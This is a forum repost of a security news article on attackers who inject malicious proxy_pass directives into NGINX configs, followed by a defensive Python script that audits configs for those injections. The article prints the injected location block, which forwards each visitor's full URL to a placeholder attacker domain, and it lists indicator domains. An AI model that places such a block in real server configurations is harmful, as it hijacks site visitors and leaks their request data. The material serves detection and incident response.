Threat Actors Hacking NGINX Servers to Redirect Web Traffic to Malicious Servers
Tech Press Releases forum (https://techpressreleases.io/press-releases), Newsgroup / 2026, thread /showthread.php?tid=30
Posted by jasongeek - 02-06-2026

Threat Actors Hacking NGINX Servers to Redirect Web Traffic to Malicious Servers
By Abinaya - February 5, 2026

A sophisticated campaign has been uncovered in which threat actors are stealthily compromising NGINX servers to redirect web traffic to malicious destinations. The attackers, previously linked to “React2Shell” exploits, are now targeting NGINX configurations, specifically those using the Baota (BT) management panel, which is widely used in Asia.

How the Attack Works

Instead of installing traditional malware, these attackers modify the server’s legitimate configuration files. By injecting malicious directives into NGINX’s location blocks, they can intercept user traffic and route it through attacker-controlled servers without the site owner noticing immediately.

The campaign uses a straightforward, automated workflow involving several shell scripts:

| Script Name | Role | Primary Function | Target |
| --- | --- | --- | --- |
| zx.sh | The Orchestrator | Initializes environment and downloads required tools | Acts as entry point for the attack chain |
| bt.sh | Baota Injector | Scans for Baota panel configs and injects malicious code | Targets /www/server/panel/vhost/nginx |
| 4zdh.sh | Advanced Injection | Injects payload into NGINX configs after validation | Targets generic Linux NGINX installs |
| zdh.sh | Advanced Injection | Same as 4zdh.sh with config verification | Collects and uploads the hijacked domain list |
| ok.sh | Exfiltration | Acts as an entry point for the attack chain | Sends data to attacker C2 server |

The core of the attack relies on the proxy_pass directive. This standard NGINX feature is designed to forward traffic to backend servers (such as a PHP application). However, the attackers reconfigure it to send users to their own malicious domains, such as gambling or scam sites. They also use proxy_set_header to ensure the hijacked traffic retains legitimate-looking headers, making the redirection harder to detect in standard logs.
```nginx
location /%PATH%/ {
    set $fullurl "$scheme://$host$request_uri";
    rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break;
    proxy_set_header Host [Attacker_Domain];
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header X-Forwarded-Proto $scheme;
    proxy_set_header User-Agent $http_user_agent;
    proxy_set_header Referer $http_referer;
    proxy_ssl_server_name on;
    proxy_pass http://[Attacker_Domain];
}
```

The campaign heavily targets Asian top-level domains (TLDs) such as .in, .id, .th, and .bd, as well as government (.gov) and educational (.edu) websites.

Datadog Security Research advises administrators to check their NGINX configuration files for unexpected proxy_pass directives pointing to the following known malicious domains:

| Indicator Type | Value | Threat Category | Status | Notes |
| --- | --- | --- | --- | --- |
| Domain | xzz.pier46[.]com | Suspected C2 / Malware Infrastructure | Active (unverified) | Observed in malicious campaign |
| Domain | ide.hashbank8[.]com | Suspected C2 / Malware Infrastructure | Active (unverified) | Used for attacker communications |
| Domain | th.cogicpt[.]org | Suspected C2 / Malware Infrastructure | Active (unverified) | Potential exfiltration endpoint |

Additionally, network logs showing traffic to IP 158.94.210[.]227 indicate active communication with the attackers’ infrastructure.

Source: https://cybersecuritynews.com/threat-actors-hacking-nginx-servers/
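One way to act on the advice above, as an added example that is not code from the article, from Datadog, or from the forum post: a small Python auditor that walks the location blocks of an NGINX config text, flags proxy_pass targets that appear on the article's indicator list or fall outside a site-specific allowlist (ALLOWED_UPSTREAMS is an assumption to adjust per deployment), and reports the two structural hallmarks of the injected block (a literal Host override, and a rewrite that forwards the captured full URL). The sample config embedded below is constructed for the demonstration.

```python
import re
# Indicators published in the article, with the defanging "[.]" removed so they match real configs
KNOWN_BAD_HOSTS = {"xzz.pier46.com", "ide.hashbank8.com", "th.cogicpt.org", "158.94.210.227"}
# Assumption: upstreams this deployment legitimately proxies to (add your named upstream{} blocks)
ALLOWED_UPSTREAMS = {"127.0.0.1", "localhost", "unix"}

def _location_blocks(conf):
    """Yield (location header, body) pairs, matching braces so nested blocks stay intact."""
    for m in re.finditer(r"location\s+[^{]*\{", conf):
        depth, i = 1, m.end()
        while i < len(conf) and depth:
            depth += {"{": 1, "}": -1}.get(conf[i], 0)
            i += 1
        yield m.group(0).rstrip("{").strip(), conf[m.end():i - 1]

def audit_nginx_conf(conf):
    """Return (location, reason) findings for proxy_pass hijack indicators in one config text."""
    findings = []
    for loc, body in _location_blocks(conf):
        for target in re.findall(r"proxy_pass\s+(\S+?)\s*;", body):
            # Reduce scheme://host:port/path to the bare host before comparing
            host = re.sub(r"^\w+://", "", target).split("/")[0].split(":")[0]
            if host in KNOWN_BAD_HOSTS:
                findings.append((loc, f"proxy_pass to known malicious host {host}"))
            elif host not in ALLOWED_UPSTREAMS:
                findings.append((loc, f"proxy_pass to unexpected upstream {host}"))
        # Injection hallmarks: Host pinned to a literal, and the visitor's full URL captured into a variable that a rewrite hands to the upstream
        if re.search(r"proxy_set_header\s+Host\s+(?!\$)\S+\s*;", body):
            findings.append((loc, "Host header overridden with a literal"))
        for var in re.findall(r'set\s+(\$\w+)\s+"[^"]*\$request_uri[^"]*"\s*;', body):
            if re.search(r"rewrite\s[^;]*" + re.escape(var), body):
                findings.append((loc, f"full request URL ({var}) forwarded via rewrite"))
    return findings

# Constructed sample: a legitimate local backend plus a block shaped like the article's injection
SAMPLE_CONF = """
server {
    location / {
        proxy_pass http://127.0.0.1:8080;
        proxy_set_header Host $host;
    }
    location /news/ {
        set $fullurl "$scheme://$host$request_uri";
        rewrite ^/news/?(.*)$ /index.php?domain=$fullurl&$args break;
        proxy_set_header Host xzz.pier46.com;
        proxy_pass http://xzz.pier46.com;
    }
}
"""
```

Feed each file under /www/server/panel/vhost/nginx (or your distribution's conf.d or sites-enabled directory) to audit_nginx_conf; an empty list means no indicator matched, while any finding on a location you did not create warrants a diff against your last known-good configuration.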